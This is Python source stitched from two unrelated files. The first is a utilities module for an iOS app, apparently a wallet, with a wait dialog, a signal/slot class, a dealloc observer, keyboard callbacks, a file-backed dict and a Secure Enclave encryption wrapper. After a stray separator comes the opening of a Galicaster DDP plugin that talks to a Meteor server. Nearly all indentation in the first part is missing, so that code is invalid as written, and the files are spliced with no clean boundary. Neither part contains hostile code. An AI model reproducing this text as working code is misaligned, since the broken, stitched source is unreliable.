class WaitingDialog:
    '''Shows a please wait dialog whilst running a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, vc, message, task, on_success=None, on_error=None):
assert vc
self.vc = vc
self.thread = TaskThread()
def onPresented() -> None:
self.thread.add(task, on_success, self.dismisser, on_error)
#title = _("Please wait")
#self.alert=show_alert(vc = self.vc, title = title, message = message, actions=[], completion=onPresented)
self.alert = show_please_wait(vc = self.vc, message = message, completion=onPresented)
def __del__(self):
#print("WaitingDialog __del__")
pass
def wait(self):
self.thread.wait()
def on_finished(self) -> None:
self.thread.stop()
self.wait()
self.alert = None
self.thread = None
def dismisser(self) -> None:
def compl() -> None:
self.on_finished()
self.vc.dismissViewControllerAnimated_completion_(True, compl)
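# Usage sketch for WaitingDialog ('vc' and 'slow_task' are illustrative stand-ins for a presented
# UIViewController and a Python callable; on_error receives sys.exc_info() from TaskThread):
#   WaitingDialog(vc, _("Please wait..."), slow_task,
#                 on_success=lambda result: print("done:", result),
#                 on_error=lambda exc_info: print("failed:", exc_info))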
###
# NS -> py cache since our obj-c objects can't store python attributes :/
###
_nspy_dict = dict()
def nspy_get(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.get(ns.ptr.value,None)
def nspy_put(ns : ObjCInstance, py : Any) -> None:
global _nspy_dict
_nspy_dict[ns.ptr.value] = py
def nspy_pop(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.pop(ns.ptr.value,None)
def nspy_get_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if isinstance(m, dict):
ret = m.get(name,None)
return ret
def nspy_put_byname(ns : ObjCInstance, py : Any, name : str) -> None:
m = nspy_get(ns)
needPutBack = False
if m is None:
m = dict()
needPutBack = True
if isinstance(m, dict):
m[name] = py
if needPutBack: nspy_put(ns, m)
def nspy_pop_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if m and isinstance(m, dict):
ret = m.pop(name,None)
if not m: nspy_pop(ns) # clean up when dict is empty
return ret
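# Usage sketch: attach arbitrary Python state to an ObjC instance via the helpers above
# ('some_objc_view' and the 'model' key are illustrative only):
#   nspy_put_byname(some_objc_view, {'history': []}, 'model')
#   model = nspy_get_byname(some_objc_view, 'model')
#   nspy_pop_byname(some_objc_view, 'model')   # the per-object dict is dropped once it becomes empty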
####################################################################
# Another take on signals/slots -- Python-only signal/slot mechanism
####################################################################
class PySig:
Entry = namedtuple('Entry', 'func key is_ns')
def __init__(self):
self.clear()
def clear(self) -> None:
try:
del self.entries
except AttributeError:
pass
self.entries = list() # list of slots
def connect(self, func : Callable, key : Any = None) -> None:
        ''' Note: the func arg, for now, needs to take explicit args -- *args/**kwargs signatures are not yet supported.'''
if not callable(func):
raise ValueError("Passed-in arg to PySig connect is not a callable!")
is_ns = False
if isinstance(key, ObjCInstance):
is_ns = True
key = key.ptr.value
entry = PySig.Entry(func, key, is_ns)
self.entries.append(entry)
def disconnect(self, func_or_key : Any = None) -> None:
if func_or_key is None:
self.clear()
return
func = None
key = None
removeAll = False
if callable(func_or_key):
func = func_or_key
else:
key = func_or_key
if isinstance(key, ObjCInstance):
key = key.ptr.value
removeAll = True
removeCt = 0
        for i, entry in reversed(list(enumerate(self.entries))):  # iterate a reversed copy so pops don't skip entries
if (key is not None and key == entry.key) or (func is not None and func == entry.func):
self.entries.pop(i)
removeCt += 1
if not removeAll: return
if removeCt: return
name = "<Unknown NSObject>"
try:
name = str(func_or_key)
except:
print(str(sys.exc_info()[1]))
finally:
NSLog("PySig disconnect: *** WARNING -- could not find '%s' in list of connections!",name)
def emit_common(self, require_sync : bool, *args) -> None:
def doIt(entry, wasMainThread, *args) -> None:
try:
if not wasMainThread and (not self.entries or entry not in self.entries):
# entry was removed from underneath us before callback ran!
pass
else:
sig = signature(entry.func)
# call slot...
entry.func(*args[:len(sig.parameters)])
finally:
#if not wasMainThread and entry.is_ns:
# release iff NSObject..
# ObjCInstance(objc_id(entry.key)).release()
# NSLog(" *** NSObject release")
pass
isMainThread = bool(NSThread.currentThread.isMainThread)
# guard against slots requesting themselves to be removed while this loop is iterating
entries = self.entries.copy()
#if not isMainThread: # first, run through all entries that may be NSObjects and retain them
#for entry in entries:
# if it's an NSObject, retain it then release it in the embedded callback
#if entry.is_ns:
# NSLog(" *** NSObject retain")
# ObjCInstance(objc_id(entry.key)).retain()
# next, call the slots in the main thread, optionally releasing any nsobject retained above
for entry in entries:
if isMainThread:
doIt(entry, isMainThread, *args)
elif require_sync:
do_in_main_thread_sync(doIt, entry, isMainThread, *args)
else:
do_in_main_thread(doIt, entry, isMainThread, *args)
def emit(self, *args) -> None:
self.emit_common(False, *args)
def emit_sync(self, *args) -> None:
self.emit_common(True, *args)
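# Minimal PySig sketch (illustrative): one slot, emitted with one argument. Slots are invoked on the
# main thread; emit() queues the call, emit_sync() blocks until the slot has run.
#   sig = PySig()
#   sig.connect(lambda amount: print("got", amount))
#   sig.emit(21)
#   sig.disconnect()   # or disconnect(func) / disconnect(key) for a single slot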
class MyNSObs(NSObject):
@objc_method
def dealloc(self) -> None:
#print("MyNSObs dealloc")
sig = nspy_pop(self)
if sig is not None:
#print("MyNSObs -- sig was found...")
sig.emit(sig.ptr)
sig.observer = None
else:
print("MyNSObs -- sig was None!")
send_super(__class__,self,'dealloc')
class NSDeallocObserver(PySig):
''' Provides the ability to observe the destruction of an objective-c object instance, and be notified of said
object's destruction on the main thread via our Qt-like 'signal' mechanism. For an example of this class's usefulness,
see the 'register_keyboard_callbacks' function later in this file.
Note that it is not necessary to keep a reference to this object around as it automatically gets associated with
internal data structures and auto-removes itself once the signal is emitted. The signal itself has 1 param, the objc_id
of the watched object. The watched object may or may not still be alive when the signal is emitted, however.'''
def __init__(self, ns : ObjCInstance, observer_class : MyNSObs = None):
if not isinstance(ns, (ObjCInstance, objc_id)):
raise ValueError("Argument for NSDeallocObserver must be an ObjCInstance or objc_id")
super().__init__()
self.ptr = ns.ptr if isinstance(ns, ObjCInstance) else ns
import rubicon.objc.runtime as rt
if observer_class is None: observer_class = MyNSObs
self.observer = observer_class.new().autorelease()
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, self.observer.ptr, 0x301)
nspy_put(self.observer, self) # our NSObject keeps a strong reference to us
def dissociate(self) -> None:
self.disconnect()
import rubicon.objc.runtime as rt
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, objc_id(0), 0x301)
'''
# This is here for debugging purposes.. Commented out as __del__ is dangerous if it has external dependencies
def __del__(self):
#print ("NSDeallocObserver __del__")
if self.observer:
print("NSDeallocObserver __del__: self.observer was not nil!")
nspy_pop(self.observer)
#super().__del__()
'''
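# Usage sketch (illustrative): be told when some NSObject instance gets dealloc'd. No reference to the
# observer needs to be kept -- it lives on as an associated object of the watched instance.
#   obs = NSDeallocObserver(some_objc_view)
#   obs.connect(lambda ptr: print("view with objc_id", ptr, "was dealloc'd"))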
def set_namedtuple_field(nt : object, fieldname : str, newval : Any) -> object:
try:
d = nt._asdict()
except:
raise ValueError('set_namedtuple_field, first argument does not appear to be a valid namedtuple!')
if not isinstance(fieldname, str):
raise ValueError('set_namedtuple_field, fieldname (second arg) must be a string!')
if fieldname not in d:
raise ValueError('%s is not a field in namedtuple %s'%(str(fieldname),type(nt).__qualname__))
else:
d[fieldname] = newval
return type(nt)(**d)
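# Example sketch for set_namedtuple_field (purely illustrative):
#   Pt = namedtuple('Pt', 'x y')
#   set_namedtuple_field(Pt(1, 2), 'y', 5)   # -> Pt(x=1, y=5); the original tuple is left untouched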
#########################################################################################################
# Data Manager -- domain based data cache -- uses this app's PySig mechanism to announce interested #
# subsystems about data updates. Used by tx history (and other app mechanisms). Instances live in #
# the gui.ElectrumGui instance. .emit() implicitly empties the cache. emptyCache() implicitly emits. #
#########################################################################################################
class DataMgr(PySig):
def __init__(self):
super().__init__()
        #self.clear() # super calls clear, which calls this instance method, which itself calls super().clear().. python inheritance is weird
def clear(self):
super().clear()
self.datas = dict()
def keyify(self, key: Any) -> Any:
if isinstance(key, (list,tuple,dict,set)):
key = str(key)
return key
def get(self, realkey : Any) -> Any:
key = self.keyify(realkey)
if key not in self.datas:
#print("DataMgr: cache miss for domain (%s), calling doReload"%(str(key)))
self.datas[key] = self.doReloadForKey(realkey)
else:
pass
#print("DataMgr: cache HIT for domain (%s)"%(str(key)))
return self.datas.get(key, None)
def emptyCache(self, noEmit : bool = False, require_sync : bool = False, *args) -> None:
self.datas = dict()
if not noEmit:
super().emit_common(require_sync = require_sync, *args)
def emit_common(self, require_sync : bool, *args) -> None:
self.emptyCache(noEmit = False, require_sync = require_sync, *args)
def doReloadForKey(self, key : Any) -> Any:
NSLog("DataMgr: UNIMPLEMENTED -- doReloadForKey() needs to be overridden in a child class!")
return None
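# Subclass sketch (hypothetical names): a cache keyed by wallet that reloads history on demand.
#   class HistoryMgr(DataMgr):
#       def doReloadForKey(self, key):
#           return load_history_for_wallet(key)   # 'load_history_for_wallet' is illustrative only
#   # histmgr.get('default_wallet') returns cached data; histmgr.emit() empties the cache and notifies slots.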
######
### Various helpers for laying out text, building attributed strings, etc...
######
_f1 = UIFont.systemFontOfSize_weight_(16.0,UIFontWeightBold).retain()
_f2 = UIFont.systemFontOfSize_weight_(11.0,UIFontWeightBold).retain()
_f2_ipad = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightSemibold).retain()
_f3 = UIFont.systemFontOfSize_weight_(1.0,UIFontWeightThin).retain()
_f4 = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightLight).retain()
_s3 = ns_from_py(' ').sizeWithAttributes_({NSFontAttributeName:_f3})
_kern = -0.5 # kerning for some of the text labels in some of the views (in points). Despite having given this an underscore name, other files in this package refer to this symbol. ;)
def stripAmount(s : str) -> str:
return s.translate({ord(i):None for i in '+- '}) #strip +/-
def makeFancyDateAttrString(datestr : str, font : ObjCInstance = None) -> ObjCInstance:
''' Make the ending MM:SS of the date field be 'light' text as per Max's UI spec '''
if font is None: font = _f4
if datestr: datestr = datestr.translate({ord('-') : '.'}) # replace hyphens in date with '.' chars as per Max's recommendations
ats = NSMutableAttributedString.alloc().initWithString_(datestr).autorelease()
l = len(datestr)
ix = datestr.rfind(' ', 0, l)
if ix >= 0:
r = NSRange(ix,l-ix)
ats.addAttribute_value_range_(NSFontAttributeName,font,r)
return ats
def hackyFiatAmtAttrStr(amtStr : str, fiatStr : str, ccy : str, pad : float, color : ObjCInstance = None, cb : Callable = None, kern : float = None, amtColor = None, isIpad = False) -> ObjCInstance:
#print("str=",amtStr,"pad=",pad,"spacesize=",_s3.width)
p = ''
if fiatStr:
if pad > 0.0:
n = round(pad / _s3.width)
p = ''.join([' ' for i in range(0, n)])
fiatStr = p + ' ' + fiatStr + ' ' + ccy
else:
fiatStr = ''
ats = NSMutableAttributedString.alloc().initWithString_(amtStr + fiatStr).autorelease()
rAmt = NSRange(0,len(amtStr))
ats.addAttribute_value_range_(NSFontAttributeName,_f1,rAmt)
if amtColor: ats.addAttribute_value_range_(NSForegroundColorAttributeName,amtColor,rAmt)
if fiatStr:
if callable(cb): cb()
r0 = NSRange(len(amtStr),len(p))
ats.addAttribute_value_range_(NSFontAttributeName,_f3,r0)
r = NSRange(len(amtStr)+len(p),len(fiatStr)-len(p))
r2 = NSRange(ats.length()-(len(ccy)+1),len(ccy))
ats.addAttribute_value_range_(NSFontAttributeName,_f2 if not isIpad else _f2_ipad,r)
if kern: ats.addAttribute_value_range_(NSKernAttributeName,kern,r)
#ats.addAttribute_value_range_(NSBaselineOffsetAttributeName,3.0,r)
if color:
ats.addAttribute_value_range_(NSForegroundColorAttributeName,color,r)
#ats.addAttribute_value_range_(NSFontAttributeName,_f3,r2)
#ats.addAttribute_value_range_(NSObliquenessAttributeName,0.1,r)
#ps = NSMutableParagraphStyle.new().autorelease()
#ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
#ps.alignment = NSJustifiedTextAlignment
#ps.lineBreakMode = NSLineBreakByWordWrapping
#ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
return ats
###############################################################################
# Facility to register python callbacks for when the keyboard is shown/hidden #
###############################################################################
_kbcb_idx = 0
_kbcb_dict = dict()
_kbcb_Entry = namedtuple('_kbcb_Entry', 'handle view obs handler onWillHide onWillShow onDidHide onDidShow')
class UTILSKBCBHandler(NSObject):
handle = objc_property()
@objc_method
def dealloc(self) -> None:
self.handle = None
send_super(__class__, self, 'dealloc')
@objc_method
def willHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onWillHide: entry.onWillHide()
@objc_method
def didHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onDidHide: entry.onDidHide()
@objc_method
def willShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onWillShow: entry.onWillShow(rect)
@objc_method
def didShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onDidShow: entry.onDidShow(rect)
# it's safe to never unregister, as an objc associated object will be created for the view in question and will clean everything up on
# view dealloc. The '*Hide' callbacks should take 0 arguments, the '*Show' callbacks take 1, a CGRect of the keyboard in the destination view's coordinates
def register_keyboard_callbacks(view : ObjCInstance, onWillHide = None, onWillShow = None, onDidHide = None, onDidShow = None) -> int:
    if not any([onWillHide, onWillShow, onDidHide, onDidShow]) or not view or not isinstance(view, UIView):
NSLog("WARNING: register_keyboard_callbacks: need at least one callback specified, as well as non-null view! Will return early!")
return 0
global _kbcb_idx
_kbcb_idx += 1
handle = _kbcb_idx
obs = NSDeallocObserver(view)
handler = UTILSKBCBHandler.new()
handler.handle = handle
entry = _kbcb_Entry(handle, view, obs, handler, onWillHide, onWillShow, onDidHide, onDidShow)
if entry.onWillHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willHide:'),UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willShow:'),UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didHide:'),UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didShow:'),UIKeyboardDidShowNotification,None)
_kbcb_dict[handle] = entry
obs.connect(lambda x: unregister_keyboard_callbacks(handle))
return handle
# unless you call this, the keyboard callback will stay alive until the target view is dealloc'd. At which time all resources
# WILL be cleaned-up. This function is provided in case you want to stop observing the keyboard hide/show events early.
def unregister_keyboard_callbacks(handle : int) -> None:
entry = None
if isinstance(handle, int): entry = _kbcb_dict.pop(handle, None)
if entry:
if entry.onWillHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidShowNotification,None)
entry.obs.disconnect()
entry.obs.dissociate()
entry.handler.release()
else:
NSLog("*** WARNING: unregister_keyboard_callbacks could not find handle %d!", handle)
# boilerplate code below to auto-scroll textfields/textviews when keyboard shown. Install this in viewWillAppear.
def register_keyboard_autoscroll(sv : UIScrollView) -> int:
if not isinstance(sv, UIScrollView):
NSLog("*** WARNING: register_keyboard_autoscroll called but it wasn't passed a UIScrollView. Ignoring!")
return None
def kbShow(r : CGRect) -> None:
resp = UIResponder.currentFirstResponder()
window = sv.window()
if resp and isinstance(resp, UIView) and window and resp.window():
#r = sv.convertRect_toView_(r, window)
visible = sv.convertRect_toView_(sv.bounds, window)
visible.size.height -= r.size.height
respFrame = resp.convertRect_toView_(resp.bounds, window)
origin = respFrame.origin
bottomLeft = CGPoint(origin.x, origin.y+respFrame.size.height)
diff = None
if not CGRectContainsPoint(visible, bottomLeft) and (is_portrait() or is_ipad()):
diff = (bottomLeft.y - (visible.origin.y+visible.size.height)) + 25.0
elif not CGRectContainsPoint(visible, origin):
diff = origin.y - visible.origin.y - 25.0
if diff:
'''
def fmt(x):
if isinstance(x, CGRect):
return "%f,%f,%f,%f"%(x.origin.x,x.origin.y,x.size.width,x.size.height)
elif isinstance(x, CGPoint):
return "%f,%f"%(x.x,x.y)
else:
return str(x)
print("window",fmt(window.bounds),"origin",fmt(origin),"bottomLeft",fmt(bottomLeft),"respFrame",fmt(respFrame),"visible",fmt(visible),"contentOffset",fmt(sv.contentOffset))
'''
scrollPoint = CGPoint(0.0, sv.contentOffset.y + diff)#origin.y - visible.size.height + respFrame.size.height + 10)
sv.setContentOffset_animated_(scrollPoint, True)
#def kbHide() -> None:
# #sv.setContentOffset_animated_(CGPoint(0,0), True)
# pass
return register_keyboard_callbacks(sv, onWillShow = kbShow)#, onDidHide = kbHide)
# be sure to unregister the autoscroller when view disappears. Install unregister call in viewWillDisappear.
def unregister_keyboard_autoscroll(handle : int) -> None:
unregister_keyboard_callbacks(handle)
##### File Backed Dict
class FileBackedDict(object):
def __init__(self, fileName : str, other : object = None):
self._d = dict()
self._fn = fileName
if isinstance(other, FileBackedDict):
self._d = other._d.copy()
if self.write():
NSLog("File-backed dict '%s' created as copy of '%s'",os.path.split(self._fn)[-1],os.path.split(other._fn)[-1])
else:
if os.path.exists(self._fn): self.read()
else: NSLog("New empty file-backed dict '%s' -- will create file once data is added.",os.path.split(self._fn)[-1])
def read(self) -> bool:
if not os.path.exists(self._fn):
NSLog("*** WARNING: JSON dict file does not (yet?) exist: %s", self._fn)
return False
try:
with open(self._fn, "r") as f:
result = json.load(f)
except:
NSLog("*** WARNING: Cannot read JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
if not isinstance(result, dict):
NSLog("*** WARNING: JSON file read but is not a dict: %s", self._fn)
return False
self._d = result
return True
def write(self) -> bool:
try:
with open(self._fn, "w") as f:
json.dump(self._d, f, indent=4)
os.chmod(self._fn, stat.S_IREAD | stat.S_IWRITE)
except:
NSLog("*** WARNING: Cannot write JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
return True
def dict(self) -> dict:
return self._d
def get(self, key : Any, default : Any = None) -> Any:
return self._d.get(key, default)
def set(self, key : Any, value : Any, save : bool = True) -> None:
self._d[key] = value
if save: self.write()
def has(self, key : Any) -> bool:
return bool(key in self._d)
def pop(self, key : Any, save : bool = True) -> Any:
if not isinstance(save, bool):
NSLog("*** WARNING: FileBackedDict's pop() method doesn't take a default value. The second argument is always the 'save' arg!")
ret = self._d.pop(key, None)
if save: self.write()
return ret
def clearAll(self, save : bool = True) -> None:
self._d = dict()
if save: self.write()
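# Usage sketch for FileBackedDict (the path is illustrative):
#   prefs = FileBackedDict(os.path.join(data_dir, 'prefs.json'))
#   prefs.set('last_tab', 2)      # persists to disk immediately (save=True by default)
#   prefs.get('last_tab', 0)
#   prefs.pop('last_tab')         # NB: the second positional arg is 'save', not a default value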
##### Wrapper for iOS Secure key enclave -- instantiates a KeyInterface class on the Objective C side. Note this requires TouchID/FaceID
class SecureKeyEnclave:
instances = 0
def __init__(self, keyDomain : str):
self._keyInterface = KeyInterface.keyInterfaceWithPublicKeyName_privateKeyName_(keyDomain + ".pubkey", keyDomain + ".privkey").retain()
SecureKeyEnclave.instances += 1
#NSLog("SecureKeyEnclave: instance created (%d total extant instances)",SecureKeyEnclave.instances)
def __del__(self):
try:
if self._keyInterface:
self._keyInterface.release()
self._keyInterface = None
SecureKeyEnclave.instances -= 1
NSLog("SecureKeyEnclave: instance deleted (%d total instances left)",SecureKeyEnclave.instances)
except:
pass
def biometrics_available(self) -> bool:
return self._keyInterface.biometricsAreAvailable
def biometrics_are_not_available_reason(self) -> str: # returns failure reason if unavailable, or '' if available
err = objc_id(0)
if not self._keyInterface.biometricsAreAvailableWithError_(byref(err)):
if err and err.value:
err = ObjCInstance(err)
return str(err.description)
else:
return 'Unknown Reason'
return ''
def has_keys(self) -> bool:
return bool(self._keyInterface.publicKeyExists)
def delete_keys(self) -> bool:
return self._keyInterface.deleteKeyPair()
# Asynchronously generate the private/public keypair. Note that touchID doesn't seem to come up when this is called
    # but it may. Completion is called on success or error. If error, the first arg is False and the second arg may be an iOS error string.
def generate_keys(self, completion : Callable[[bool,str],None] = None) -> None:
if self._keyInterface.publicKeyExists:
if callable(completion):
completion(True,'')
return
def Compl(b : bool, e : objc_id) -> None:
e = ObjCInstance(e) if e and e.value else None
if callable(completion): completion(bool(b),str(e.description) if e else '')
self._keyInterface.generateTouchIDKeyPairWithCompletion_(Compl)
def encrypt_data(self, data : bytes) -> bytes:
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('SecureKeyEnclave.encrypt_data requires a bytes argument!')
plainText = NSData.dataWithBytes_length_(data,len(data))
err = objc_id(0)
cypherText = self._keyInterface.encryptData_error_(plainText, byref(err))
if not cypherText:
e = str(ObjCInstance(err).description) if err and err.value else ''
NSLog("SecureKeyEnclave encrypt data failed with error: %s",e)
return None
return bytes((c_ubyte * cypherText.length).from_address(cypherText.bytes))
# input: any plaintext string. output: a hex representation of the encrypted cyphertext data eg 'ff80be3376ff..'
def encrypt_str2hex(self, plainText : str) -> str:
b = self.encrypt_data(plainText)
if b is not None:
import binascii
return binascii.hexlify(b).decode('utf-8')
return None
# the inverse of the above. input: a hex string, eg 'ff80be3376...', callback is called with (plainText:str, error:str) as args
def decrypt_hex2str(self, hexdata : str, completion : Callable[[str,str],None], prompt : str = None) -> None:
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
import binascii
cypherBytes = binascii.unhexlify(hexdata)
def MyCompl(pt : bytes, error : str) -> None:
plainText = pt.decode('utf-8') if pt is not None else None
completion(plainText, error)
self.decrypt_data(cypherBytes, MyCompl, prompt = prompt)
# May pop up a touchid window, which user may cancel. If touchid not available, or user cancels, the completion is called
# with None,errstr as args (errStr comes from iOS and is pretty arcane).
# Otherwise completion is called with the plainText bytes as first argument on success.
def decrypt_data(self, data : bytes, completion : Callable[[bytes,str],None], prompt : str = None) -> None:
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
if not prompt: prompt = _("Authenticate, please")
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('A bytes or str object is required as the first argument to this function!')
cypherText = NSData.dataWithBytes_length_(data, len(data))
def Compl(dptr : objc_id, eptr : objc_id) -> None:
plainText = ObjCInstance(dptr) if dptr and dptr.value else None
error = ObjCInstance(eptr).description if eptr and eptr.value else None
if plainText:
plainText = bytes((c_ubyte * plainText.length).from_address(plainText.bytes))
completion(plainText, error)
self._keyInterface.prompt = prompt
self._keyInterface.decryptData_completion_(cypherText, Compl)
'''
@classmethod
def DoTests(cls, bundleId : str, doDelete : bool = False) -> None:
keyEnclave = cls(bundleId)
print("BioMetricsAvail:",keyEnclave.biometrics_available())
print("BioMetricsNotAvailReason:",keyEnclave.biometrics_are_not_available_reason())
if doDelete:
keyEnclave.delete_keys()
print("Deleted All Keys")
pt = b'The quick brown fox jumped over the lazy dogs!!\0\0'
ptstr = pt.decode('utf-8')
def DataDecrypted(pts : str, error : str) -> None:
if pts is None:
print("Got decryption error", error)
else:
print("decrypted data was [",pts.encode('utf-8'),"]","compare =", pts==ptstr)
def DoEnc() -> None:
c = keyEnclave.encrypt_str2hex(ptstr)
if c is not None:
print("cypherText=",c)
keyEnclave.decrypt_hex2str(c,DataDecrypted)
else:
print("CypherText was NONE...!")
def KeysGenerated(b : bool, e : str) -> None:
print("Keys generated:",b,e)
if b: DoEnc()
if not keyEnclave.has_keys():
keyEnclave.generate_keys(KeysGenerated)
else:
DoEnc()
def Cleaner() -> None:
# keep a ref around for 10s then delete object.
nonlocal keyEnclave
keyEnclave = None
call_later(10.0, Cleaner)
'''
##### Boilerplate crap
class boilerplate:
# iOS weirdness. Buttons don't always flash to highlighted state on tap.. so we have to force it using this hack.
@staticmethod
def vc_highlight_button_then_do(vc : UIViewController, but : UIButton, func : Callable[[],None]) -> None:
#if not isinstance(vc, UIViewController) or not isinstance(but, UIButton) or not callable(func):
# raise ValueError('One of the arguments passed to vc_highlight_button_then_do is invalid!')
but.retain()
call_later(0.030, lambda: but.setHighlighted_(True))
call_later(0.3, lambda: but.autorelease().setHighlighted_(False))
vc.retain()
call_later(0.1, lambda: vc.autorelease().viewIfLoaded and func())
# Layout constraint stuff.. programatically
@staticmethod
def layout_peg_view_to_superview(view : UIView) -> None:
if not view.superview():
NSLog("Warning: layout_peg_view_to_superview -- passed-in view lacks a superview!")
return
sv = view.superview()
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterX, NSLayoutRelationEqual, view, NSLayoutAttributeCenterX, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterY, NSLayoutRelationEqual, view, NSLayoutAttributeCenterY, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeHeight, NSLayoutRelationEqual, view, NSLayoutAttributeHeight, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeWidth, NSLayoutRelationEqual, view, NSLayoutAttributeWidth, 1.0, 0.0 ))
|
ddp.py
|
# DDP galicaster plugin
#
# Copyright (c) 2016 University of Sussex
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# import calendar
import cStringIO
import requests
# import socket
from threading import Event, Thread
import time
import uuid
from gi.repository import Gtk, Gdk, GObject, Pango, GdkPixbuf
from MeteorClient import MeteorClient
import pyscreenshot as ImageGrab
from PIL import Image
from galicaster.core import context
conf = context.get_conf()
dispatcher = context.get_dispatcher()
logger = context.get_logger()
def init():
ddp = DDP()
ddp.start()
class DDP(Thread):
def __init__(self):
Thread.__init__(self)
self.meteor = conf.get('ddp', 'meteor')
self.client = MeteorClient(self.meteor, debug=False)
self.client.on('added', self.on_added)
self.client.on('changed', self.on_changed)
self.client.on('subscribed', self.on_subscribed)
self.client.on('connected', self.on_connected)
self.client.on('removed', self.on_removed)
self.client.on('closed', self.on_closed)
self.client.on('logged_in', self.on_logged_in)
self.displayName = conf.get('ddp', 'room_name')
self.vu_min = -50
self.vu_range = 50
self.vu_data = 0
self.last_vu = None
self.ip = conf.get('ingest', 'address')
self.id = conf.get('ingest', 'hostname')
self._user = conf.get('ddp', 'user')
self._password = conf.get('ddp', 'password')
self._http_host = conf.get('ddp', 'http_host')
self._audiostream_port = conf.get('audiostream', 'port') or 31337
self.store_audio = conf.get_boolean('ddp', 'store_audio')
self.screenshot_file = conf.get('ddp', 'existing_screenshot')
self.high_quality = conf.get_boolean('ddp', 'hq_snapshot')
self.paused = False
self.recording = False
self.currentMediaPackage = None
self.currentProfile = None
self.has_disconnected = False
screen = Gdk.Screen.get_default()
self._screen_width = screen.get_width()
self._screen_height = screen.get_height()
self.cardindex = None
cam_available = conf.get(
'ddp',
'cam_available') or 0
if cam_available in ('True', 'true', True, '1', 1):
self.cam_available = 1
elif cam_available in ('False', 'false', False, '0', 0):
self.cam_available = 0
else:
self.cam_available = int(cam_available)
        # Get the audiostream params, either from an existing audio streaming server (e.g. Icecast) or from the audiostream plugin
if conf.get('ddp', 'existing_stream_host'):
self._stream_host = conf.get('ddp', 'existing_stream_host')
else:
self._stream_host = self.ip
if conf.get_int('ddp', 'existing_stream_port'):
self._audiostream_port = conf.get_int('ddp', 'existing_stream_port')
else:
self._audiostream_port = conf.get_int('audiostream', 'port') or 31337
if conf.get('ddp', 'existing_stream_key'):
self.stream_key = conf.get('ddp', 'existing_stream_key')
else:
self.stream_key = uuid.uuid4().get_hex()
if conf.get('ddp', 'extra_params'):
self.extra_params_list = conf.get('ddp', 'extra_params').split(';')
else:
self.extra_params_list = []
logger.info('audiostream URI: {}'.format('http://' + self._stream_host + ':' + str(self._audiostream_port) + '/' + self.stream_key))
dispatcher.connect('init', self.on_init)
